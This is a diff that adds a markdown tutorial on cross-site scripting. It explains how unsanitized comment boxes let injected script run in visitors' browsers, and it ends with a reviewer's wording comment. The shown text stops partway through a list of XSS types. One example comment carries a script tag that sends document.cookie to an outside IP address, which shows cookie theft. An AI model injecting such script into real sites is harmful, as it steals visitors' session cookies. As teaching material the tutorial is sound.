contents/security/crossSiteScripting/crossSiteScripting.md

```diff
@@ -0,0 +1,94 @@
+# Cross Site Scripting
+
+Author: Tan Wang Leng
+
+## Overview
+
+Cross site scripting (XSS) is a vulnerability found in websites.
+
+Textboxes are commonly used in forms in websites to ask the user for input. For
+example, blog websites may provide a textbox for user to enter comments.
+
+However, are they limited to just typing in plain text? For some websites, they
+may not check their input, thus users are able to use formatting HTML tags, such
+as `<b>` for bolding and `<i>` for italic.
+
+```html
+I <b>like</b> your blog post!
+```
+
+becomes: I **like** your blog post!
+
+The problem of not checking the user's input is when the user starts using HTML
+for malicious purposes. For example, HTML also supports `<script>`, for you to
+write JavaScript code on the webpage as well.
+
+```html
+This is an innocent looking comment. <script>sendToServer("http://139.241.0.3/", document.cookie)</script>
+```
+
+While any visitors of the blog will only see the non-script portion of the
+comments (i.e. `This is an innocent looking comment.`), the browser will not
+show the script portion of the comment, because it is legal HTML (you won't see
+the tags like `<b>` and `<i>` when viewing webpages, so you definitely won't see
+`<script>` on the webpage).
+
+However, the browser is **actually executing the script**. Therefore, the hacker
+can write any script that he wants (in our example, a function to send to the
+hacker the user's cookies), without the user even being aware of what's going
+on.
+
+Therefore, the hacker has managed to add additional malicious "functionality" to
+the website, that is not written by the original website developer.
+
+Resources:
+
+1. http://projects.webappsec.org/f/WASC-TC-v2_0.pdf (page 32)
+1. http://guides.rubyonrails.org/security.html#cross-site-scripting-xss
+1. https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
+1. http://www.symantec.com/connect/blogs/cross-site-scripting-vulnerabilities
+
+## Types of Cross Site Scripting
+
+There are no standard definitions, but there are at least two different types of
+XSS:
+
+* Persistent XSS (also known as stored XSS) - The JavaScript code gets stored in
+the web server. Example: Posting a malicious JavaScript code into a blog post as
+a comment. The comment gets stored in the database, and future visitors of the
```

Comment:
May be clearer to say it is the web browser of visitors which will retrieve/load the comment